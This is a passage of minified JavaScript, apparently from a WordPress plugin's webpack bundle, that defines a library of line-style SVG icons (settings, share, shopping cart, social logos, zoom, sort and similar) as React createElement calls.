24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm10 2-4.35-4.35"})),settings_tool_function_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.55 2.778A1 1 0 0 1 10.523 2h2.953a1 1 0 0 1 .975.778l.355 1.562a2 2 0 0 0 2.538 1.468l1.627-.5a1 1 0 0 1 1.155.447l1.456 2.464a1 1 0 0 1-.193 1.253l-1.16 1.04a2 2 0 0 0 0 2.978l1.16 1.038a1 1 0 0 1 .193 1.254l-1.456 2.464a1 1 0 0 1-1.155.447l-1.627-.5a2 2 0 0 0-2.538 1.468l-.355 1.56a1 1 0 0 1-.976.779h-2.952a1 1 0 0 1-.975-.778l-.355-1.562a2 2 0 0 0-2.538-1.468l-1.628.5a1 1 0 0 1-1.154-.446l-1.456-2.464a1 1 0 0 1 .193-1.254l1.16-1.038a2 2 0 0 0 0-2.979L2.61 9.472a1 1 0 0 1-.194-1.253l1.456-2.464a1 1 0 0 1 1.155-.447l1.628.5A2 2 0 0 0 9.194 4.34l.355-1.562Z"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"})),share_social_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.968 10.591a3.15 3.15 0 1 0 0 2.818m0-2.818c.212.424.332.902.332 1.409s-.12.985-.332 1.409m0-2.818 7.013-3.507M8.968 13.41l7.013 3.507m0-9.832a2.7 2.7 0 1 0 4.637-2.769 2.7 2.7 0 0 0-4.637 2.77Zm0 9.832a2.7 2.7 0 1 0 4.637 2.769 2.7 2.7 0 0 0-4.637-2.77Z"})),shopping_cart_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"})),skype_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 3c-.415 0-.823.028-1.223.082a5.5 5.5 0 0 0-7.695 7.695 9 9 0 0 0 10.14 10.14 5.5 5.5 0 0 0 7.695-7.695A9 9 0 0 0 12 3Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 10c0-1-1-2-3-2s-3 1-3 2c0 2.5 6 1.5 6 4 0 1-1 2-3 2s-3-1-3-2"})),smile_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8.5V10m7-1.5V10m-8.271 4a5.002 5.002 0 0 0 9.542 0"})),social_community_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.632 5.032a8.446 8.446 0 0 1 5.79 8.024 8.5 8.5 0 0 1-.18 1.74M9.368 5.031a8.446 8.446 0 0 0-5.79 8.024c.001.596.063 1.178.18 1.74m13.915 4.5c.458.387 1.05.62 1.695.62A2.635 2.635 0 0 0 22 17.279a2.635 2.635 0 0 0-2.632-2.64 2.635 2.635 0 0 0-2.631 2.64c0 .81.364 1.534.936 2.018Zm0 0A8.378 8.378 0 0 1 12 21.5a8.378 8.378 0 0 1-5.673-2.204m0 0a2.636 2.636 0 0 0 .936-2.018 2.635 2.635 0 0 0-2.631-2.64A2.635 2.635 0 0 0 2 17.279a2.635 2.635 0 0 0 2.632 2.639c.645 0 1.237-.234 1.695-.62ZM14.632 5.14A2.635 2.635 0 0 1 12 7.778a2.635 2.635 0 0 1-2.632-2.64A2.635 2.635 0 0 1 12 2.5a2.635 2.635 0 0 1 2.632 2.639Z"})),square_rounded_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"})),star_rating_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.579",d:"M11.016 3.125c.387-.833 1.58-.833 1.968 0l2.136 4.602c.158.34.482.573.856.617l5.067.597c.918.108 1.286 1.233.608 1.856l-3.748 3.444a1.07 1.07 0 0 0-.326.998l.994 4.974c.18.9-.785 1.595-1.592 1.147l-4.45-2.475a1.09 1.09 0 0 0-1.059 0L7.02 21.36c-.806.448-1.771-.247-1.591-1.147l.994-4.974a1.07 1.07 0 0 0-.326-.998l-3.749-3.444c-.677-.623-.309-1.748.609-1.856l5.067-.597c.374-.044.698-.278.856-.617l2.136-4.602Z"})),stopwatch_reading_time_timer_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 13a9 9 0 1 1-18 0 9 9 0 0 1 18 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 7.5V13l3.5 2.5M12 4V1.5m-2 0h4M21 6l-2-2"})),tablet_ipad_pad_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6 3h.01"})),tag_bookmark_save_favourite_mark_discount_sale_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 4v18l6.8-5.1a2 2 0 0 1 2.4 0L20 22V4a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2Z"})),tiktok_logo_icon_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),tiktok_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),triangle_rounded_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997Z"})),triangle_shape_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20 12 3l10 17H2Z"})),twitter_x_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),upload_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 21v-8m0 0-2.5 2.5M12 13l2.5 2.5"})),view_count_show_visible_eye_open_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a5 5 0 1 0 0-10 5 5 0 0 0 0 10Z"})),view_count_show_visible_eye_open_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a3 3 0 1 0 0-6 3 3 0 0 0 0 6Z"})),view_count_show_visible_eye_open_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12c6-8.667 16-8.667 22 0-6 8.667-16 8.667-22 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 12a6 6 0 1 1-12 0 6 6 0 0 1 12 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 12a3 3 0 0 0-3-3"})),view_count_show_visible_eye_open_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 9c-1.996-3.913-6-6-10-6S3.996 5.087 2 9"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21a7 7 0 0 0 6.308-10.038 2.5 2.5 0 1 1-3.27-3.27A7 7 0 1 0 12 21Z"})),view_count_show_visible_eye_open_5_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 17a5 5 0 0 0 5-5h-5V7a5 5 0 0 0 0 10Z"})),warning_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12s4.477 10 10 10Zm0-14v4.5m0 3v.5"})),warning_triangle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997ZM12 9v4.5m0 3v.5"})),whatsapp_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.806 14.02c-.849-.282-1.532-.824-1.768-1.06-.236-.235-.778-.919-1.06-1.767l1.202-1.91L9.553 5.96c-.943 0-3.04.778-3.323 3.323-.283 2.546 1.532 5.068 2.475 6.01.942.944 3.464 2.759 6.01 2.476 2.546-.283 3.323-2.381 3.323-3.324l-3.323-1.626-1.91 1.202Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10a9.953 9.953 0 0 1-5.183-1.446L2 22l1.445-4.818A9.953 9.953 0 0 1 2 12C2 6.477 6.477 2 12 2Z"})),wordpress_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 7.454H3.818"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Zm-6.137 9.318 5.228-13.636m-3.864 9.772-4.09-10m-3.41 0 5.455 13.864"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.117 17.322 6.09 7.454H3.223m-.303.605 5.217 13.26"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.045 7.454h5M8.59 21.318l3.183-8.409M19.5 5.41h-.334a2.273 2.273 0 0 0-2.123 3.083l1.775 4.643"})),youtube_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10 15V9l5 3-5 3Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.193 4.352c-3.627-.47-10.402-.47-14.213.004-1.456.18-2.57 1.446-2.757 3.168-.297 2.719-.297 6.233 0 8.952.188 1.722 1.301 2.988 2.757 3.168 3.811.473 10.586.475 14.213.004 1.36-.177 2.375-1.365 2.562-2.972.327-2.811.327-6.541 0-9.352-.187-1.607-1.202-2.795-2.562-2.972Z"})),full_screen_corners_out_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 8.5V5C3 3.89543 3.89543 3 5 3H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M3 15.5V19C3 20.1046 3.89543 21 5 21H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M21 8V5C21 3.89543 20.1046 3 19 3H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M21 15.5V19C21 20.1046 20.1046 21 19 21H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_in_magnifying_glass_plus_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M10.995 8V14M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_out_magnifying_glass_minus_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plugin_connect_socket_integration_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M21.5 2.5L18.5 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M18 12.9999L20.5858 10.4142C21.3668 9.63311 21.3668 8.36678 20.5858 7.58573L16.4142 3.41416C15.6332 2.63311 14.3668 2.63311 13.5858 3.41416L11 5.99994",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M5.9997 11L3.41391 13.5858C2.63286 14.3668 2.63286 15.6332 3.41391 16.4142L7.58549 20.5858C8.36653 21.3668 9.63286 21.3668 10.4139 20.5858L12.9997 18",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M2.5 21.5L5.5 18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4.5 9.5L14.5 19.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M9.5 4.5L19.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M7 12L9.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12 17L14.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),rocket_fly_boost_launch_pro_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M20.8991 2.5H21.5V3.10086C21.5 6.28346 19.7357 9.83572 17.4853 12.0862L13.5714 16L8 10.4286L11.9139 6.51473C14.1643 4.26429 17.7165 2.5 20.8991 2.5Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M18.5 11L19 17L15 21L13.5 16",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8 10.5L3 9L7 5L13 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M9 15L3.5 20.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M11.5 17.5L9 20",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.5 12.5L4 15",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.4902 6.5H17.5002",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),gallery_indicator_image_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 5C3 3.89543 3.89543 3 5 3H19C20.1046 3 21 3.89543 21 5V13C21 14.1046 20.1046 15 19 15H5C3.89543 15 3 14.1046 3 13V5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M21.0002 12.6716L19.4144 11.0858C18.6333 10.3047 17.367 10.3047 16.5859 11.0858L15.9144 11.7574C15.1333 12.5384 13.867 12.5384 13.0859 11.7574L10.4144 9.08579C9.63332 8.30474 8.36699 8.30474 7.58594 9.08579L3.33594 13.3358",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M16.25 7C16.25 7.82843 15.5784 8.5 14.75 8.5C13.9216 8.5 13.25 7.82843 13.25 7C13.25 6.17157 13.9216 5.5 14.75 5.5C15.5784 5.5 16.25 6.17157 16.25 7Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M3 18.5C3 17.9477 3.44772 17.5 4 17.5H6.25C6.80228 17.5 7.25 17.9477 7.25 18.5V20C7.25 20.5523 6.80228 21 6.25 21H4C3.44772 21 3 20.5523 3 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M10 18.5C10 17.9477 10.4477 17.5 11 17.5H13.25C13.8023 17.5 14.25 17.9477 14.25 18.5V20C14.25 20.5523 13.8023 21 13.25 21H11C10.4477 21 10 20.5523 10 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M17 18.5C17 17.9477 17.4477 17.5 18 17.5H20C20.5523 17.5 21 17.9477 21 18.5V20C21 20.5523 20.5523 21 20 21H18C17.4477 21 17 20.5523 17 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"})),unlocked_open_security_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 12C4 10.8954 4.89543 10 6 10H18C19.1046 10 20 10.8954 20 12V20C20 21.1046 19.1046 22 18 22H6C4.89543 22 4 21.1046 4 20V12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17 10V7C17 4.23858 14.7615 2 12 2C10.1493 2 8.53347 3.0055 7.66895 4.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12 15.5L12 16.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),unlink_link_break_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M14.0113 17.0281L11.4972 19.5421C9.55336 21.486 6.40175 21.486 4.45789 19.5421C2.51404 17.5983 2.51404 14.4467 4.45789 12.5028L6.97193 9.98877M9.98875 6.97192L12.5028 4.45789C14.4466 2.51404 17.5983 2.51404 19.5421 4.45789C21.486 6.40174 21.486 9.55334 19.5421 11.4972L17.0281 14.0112",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M9.5 14.5L14.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M3 5L19 21",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plus_circle_zoom_in_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12 7V12.0001M12 12.0001V17M12 12.0001H17M12 12.0001H7",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_descending_order_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 18.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 6.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 12.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17 14.5V5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M13 9.5L17 5.5L21 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_ascending_order_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 5.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 17.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 11.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17 9.5V18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M13 14.5L17 18.5L21 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),right_circle_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8 12.5L10.5 15L16 9",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),subtract:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}))}},49160:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var 